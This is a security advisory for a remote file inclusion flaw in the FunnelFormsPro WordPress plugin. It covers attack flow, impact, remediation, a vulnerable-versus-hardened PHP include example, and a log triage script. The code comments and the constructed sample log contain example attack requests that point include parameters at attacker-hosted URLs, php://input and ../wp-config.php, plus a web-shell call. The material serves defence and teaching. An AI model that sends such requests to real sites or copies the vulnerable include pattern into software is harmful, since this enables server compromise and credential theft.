Overview
CVE-2026-39440 is a critical code injection vulnerability in FunnelFormsPro, a WordPress plugin developed by Funnelforms LLC. It is a remote file inclusion (RFI) flaw: an attacker can make a vulnerable WordPress installation fetch a PHP file from a server the attacker controls and execute it as part of the site. With a CVSS score of 9.9, it sits at the top of the severity scale for WordPress plugin vulnerabilities.
| Field | Details |
|---|---|
| CVE ID | CVE-2026-39440 |
| CVSS Score | 9.9 (Critical) |
| Vendor | Funnelforms LLC |
| Product | FunnelFormsPro |
| Affected Versions | All releases through 3.8.1 (no lower bound stated) |
| Fixed Version | Not stated on this page; update to the latest vendor release |
| Attack Vector | Network |
| CWE | CWE-94 — Improper Control of Generation of Code ('Code Injection') |
| Published | 2026-04-23 |
Technical Details
Remote file inclusion (RFI) occurs when a PHP application passes user-supplied input into include, include_once, require or require_once without adequate validation or restriction. In FunnelFormsPro through 3.8.1, an attacker can supply a URL pointing to a malicious PHP script hosted on an external server; the WordPress server then fetches and executes that remote file as if it were trusted local code.
Including a remote URL requires PHP's allow_url_include directive to be enabled (together with allow_url_fopen). allow_url_include has been Off by default since PHP 5.2 and is deprecated since PHP 7.4, but it may still be enabled on shared hosting or in legacy environments. Even where it is Off, an unrestricted include remains a local file inclusion (LFI) bug: the attacker can point it at local files through path traversal to disclose data such as wp-config.php, or at a file they have already placed on the server (for example through an upload feature or by poisoning a log file) to obtain code execution. Hardening php.ini therefore reduces exposure but does not remove the bug; the include itself has to be restricted.
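To make the class concrete, here is an added illustrative example of the vulnerable include shape beside a hardened version. It is not FunnelFormsPro's code (the page does not show the plugin's source); the parameter name `template`, the `templates/` directory and the template names are assumptions for the demonstration.

```php
<?php
// Added illustrative example, not FunnelFormsPro's source. The parameter name
// "template", the template directory and the template names are assumptions.

// --- Vulnerable shape of the RFI/LFI class described above ---
// With allow_url_include=On (and allow_url_fopen=On), a request carrying
// ?template=http://attacker.example/payload.txt makes PHP download and execute
// the remote file. With allow_url_include=Off the same line still accepts local
// paths, so ?template=../../../wp-config.php or a previously uploaded file with
// PHP inside it still gets included: local file inclusion.
function render_template_vulnerable(): void
{
    include $_GET['template'];   // attacker-controlled string reaches include()
}

// --- Hardened shape: allow-list, fixed extension, filesystem containment ---
const TEMPLATE_DIR = __DIR__ . '/templates';                 // assumed layout
const ALLOWED_TEMPLATES = ['contact', 'optin', 'thankyou'];  // assumed names

function resolve_template(string $name): ?string
{
    // 1. Only a known template name gets any further; this alone stops
    //    http://, php://, data:// and ../ because none of them is on the list.
    if (!in_array($name, ALLOWED_TEMPLATES, true)) {
        return null;
    }
    // 2. Belt and braces: resolve the real path and confirm it stays inside
    //    TEMPLATE_DIR. realpath() collapses ../ and symlinks, and returns false
    //    for a missing file or for any stream wrapper such as http://.
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . $name . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

function render_template_hardened(string $name): void
{
    $path = resolve_template($name);
    if ($path === null) {
        http_response_code(400);
        exit('unknown template');
    }
    include $path;   // only ever a vetted file under TEMPLATE_DIR
}

// CLI demo: every probe except a listed template name is rejected before any
// file system or network access happens. "contact" itself resolves only once
// templates/contact.php exists on disk next to this script.
if (PHP_SAPI === 'cli') {
    foreach (['contact', '../../wp-config', 'http://attacker.example/payload.txt', 'php://input'] as $probe) {
        printf("%-40s -> %s\n", $probe, resolve_template($probe) ?? 'REJECTED');
    }
}
```

The allow-list is the real fix; the realpath containment check is there so that a later change to how names are built (a prefix, a locale suffix, a user-chosen theme) cannot quietly reopen traversal. Note that realpath() never resolves http:// or php:// wrappers, so even a bug in the allow-list could not reintroduce remote inclusion through this function.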
Attack Flow
- Attacker identifies a WordPress site running FunnelFormsPro ≤ 3.8.1
- Attacker hosts a malicious PHP payload on an external server they control
- Attacker sends a crafted request to the vulnerable FunnelFormsPro endpoint, supplying the remote URL as a parameter
- The plugin fetches and includes the remote file server-side
- The malicious PHP executes in the context of the WordPress server, enabling full RCE, credential theft, or web shell installation
Why 9.9 and Not 10.0
The published CVSS vector is not reproduced on this page, but under CVSS 3.1 a base score of 9.9 is what an RCE-class flaw receives when every metric is at its maximum except Privileges Required: Low (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H). The 0.1 point therefore most likely reflects that the attacker needs some authenticated account on the site, not the allow_url_include dependency: a configuration prerequisite is expressed as Attack Complexity: High, which would lower the score to 9.0 even with no privileges required. In practice the impact is still a full compromise of the web server.
Impact
A successful exploit of CVE-2026-39440 allows an attacker to:
- Execute arbitrary PHP code on the web server
- Install web shells for persistent backdoor access
- Steal WordPress credentials, database credentials (from wp-config.php), and all site data
- Pivot to other services or databases accessible from the server
- Deface or destroy the WordPress site
- Leverage the server as a botnet node, spam relay, or cryptominer
Affected Deployments
FunnelFormsPro is a commercial WordPress plugin used to create conversion-focused forms and funnels within WordPress. Organizations using this plugin for lead capture, opt-in forms, or marketing funnels on versions 3.8.1 and below should treat this as an urgent remediation priority.
Remediation
- Update immediately to the latest version of FunnelFormsPro from Funnelforms LLC — check the plugin repository or vendor's dashboard for a patched release
- If no patch is yet available, deactivate and remove the plugin until a fix is issued
- Audit web server access logs for inbound requests that carry a URL or PHP stream wrapper (http://, php://, data://) in a query or POST parameter, and any egress or proxy logs for unexpected outbound HTTP fetches by the PHP worker; either indicates an exploitation attempt
- Review WordPress file system for unexpected PHP files in the uploads directory or plugin folders that may indicate web shell installation
- Rotate all credentials stored in wp-config.php, including the database password and the authentication keys and salts (rotating the salts logs every user out, which is the intended effect after a compromise)
- Ensure allow_url_include is set to Off in your PHP configuration as a defense-in-depth measure; it is Off by default and deprecated since PHP 7.4, but confirm the effective value in the SAPI that actually serves the site (php -i reports the CLI configuration, which can differ from PHP-FPM or mod_php)
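The log and file system audit steps above, as an added triage script that is not FunnelFormsPro or vendor code. The access-log lines in it are constructed for the example, and the admin-ajax.php endpoint and the tpl parameter are assumptions, since this page does not name the vulnerable endpoint or parameter.

```php
<?php
// Added triage helper for the audit steps above. It is not FunnelFormsPro code
// and not a vendor tool. The log lines in SAMPLE_LOG are constructed; the
// admin-ajax.php path and the "tpl" parameter are assumptions, since the real
// vulnerable endpoint and parameter are not named on this page.

// Constructed sample in Apache/nginx "combined" format (usage: php triage.php [access.log]).
const SAMPLE_LOG = <<<'LOG'
203.0.113.7 - - [23/Apr/2026:10:01:12 +0000] "GET /wp-admin/admin-ajax.php?action=ff_load&tpl=contact HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [23/Apr/2026:10:02:40 +0000] "GET /wp-admin/admin-ajax.php?action=ff_load&tpl=http://198.51.100.9/s.txt HTTP/1.1" 200 88 "-" "curl/8.4.0"
198.51.100.9 - - [23/Apr/2026:10:02:41 +0000] "GET /wp-admin/admin-ajax.php?action=ff_load&tpl=http%3A%2F%2F198.51.100.9%2Fs.txt%3F HTTP/1.1" 200 88 "-" "curl/8.4.0"
198.51.100.9 - - [23/Apr/2026:10:03:05 +0000] "POST /index.php?page=php://input HTTP/1.1" 200 0 "-" "curl/8.4.0"
192.0.2.4 - - [23/Apr/2026:10:05:00 +0000] "GET /wp-content/uploads/2026/04/cache.php?c=id HTTP/1.1" 200 40 "-" "python-requests/2.31.0"
LOG;

// Stream wrappers that turn a user-controlled include() into remote or
// attacker-supplied code (http/ftp need allow_url_include; php://, data://,
// phar:// and zip:// are the usual LFI-side tricks).
const WRAPPER_RE = '#^(?:https?|ftps?|php|data|expect|phar|zip|compress\.\w+)://#i';

/** Parse one combined-format line into the fields the triage needs. */
function parse_line(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'target' => $m[4], 'status' => (int) $m[5]];
}

/** Query parameters whose (URL-decoded) value is a URL or stream wrapper. */
function suspicious_params(string $query): array
{
    parse_str($query, $params);   // also percent-decodes, so %3A%2F%2F is caught
    $hits = [];
    foreach ($params as $name => $value) {
        if (is_string($value) && preg_match(WRAPPER_RE, $value)) {
            $hits[$name] = $value;
        }
    }
    return $hits;
}

/** Findings for a whole log: inclusion probes and PHP executed out of uploads/. */
function triage(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $r = parse_line($line);
        if ($r === null) {
            continue;
        }
        [$path, $query] = explode('?', $r['target'], 2) + [1 => ''];
        foreach (suspicious_params($query) as $p => $v) {
            $findings[] = sprintf('%s %s inclusion probe %s=%s (HTTP %d)', $r['time'], $r['ip'], $p, $v, $r['status']);
        }
        // Legitimate WordPress never writes executable PHP into uploads/; a
        // successful request for one there is a web-shell indicator.
        if ($r['status'] === 200 && preg_match('#^/wp-content/uploads/.*\.ph(?:p\d?|tml)$#i', $path)) {
            $findings[] = sprintf('%s %s PHP executed from uploads: %s', $r['time'], $r['ip'], $path);
        }
    }
    return $findings;
}

/** Web-shell hunt on disk: any PHP-executable file under the uploads directory. */
function php_files_under(string $dir): array
{
    if (!is_dir($dir)) {
        return [];
    }
    $out = [];
    $it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $f) {
        if (preg_match('/\.ph(?:p\d?|tml)$/i', $f->getFilename())) {
            $out[] = $f->getPathname();
        }
    }
    return $out;
}

if (PHP_SAPI === 'cli') {
    $log = isset($argv[1]) ? file_get_contents($argv[1]) : SAMPLE_LOG;
    foreach (triage($log) as $finding) {
        echo $finding, PHP_EOL;
    }
    foreach (php_files_under(__DIR__ . '/wp-content/uploads') as $file) {   // assumed docroot layout
        echo 'PHP file in uploads: ', $file, PHP_EOL;
    }
    // Defense-in-depth check from the last remediation item.
    foreach (['allow_url_include', 'allow_url_fopen'] as $k) {
        printf("%s=%s\n", $k, filter_var(ini_get($k), FILTER_VALIDATE_BOOLEAN) ? 'On' : 'Off');
    }
}
```

Against the constructed sample it flags the two http:// probes (the percent-encoded one is caught because parse_str decodes it), the php://input request, and the hit on cache.php under uploads. On a real server run it from the document root as php triage.php /var/log/apache2/access.log; the allow_url_include and allow_url_fopen lines report the CLI configuration, so confirm them again in the SAPI that serves the site.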
Workaround
Disable the FunnelFormsPro plugin entirely until a patched version is confirmed available. This eliminates the attack surface while a permanent fix is applied.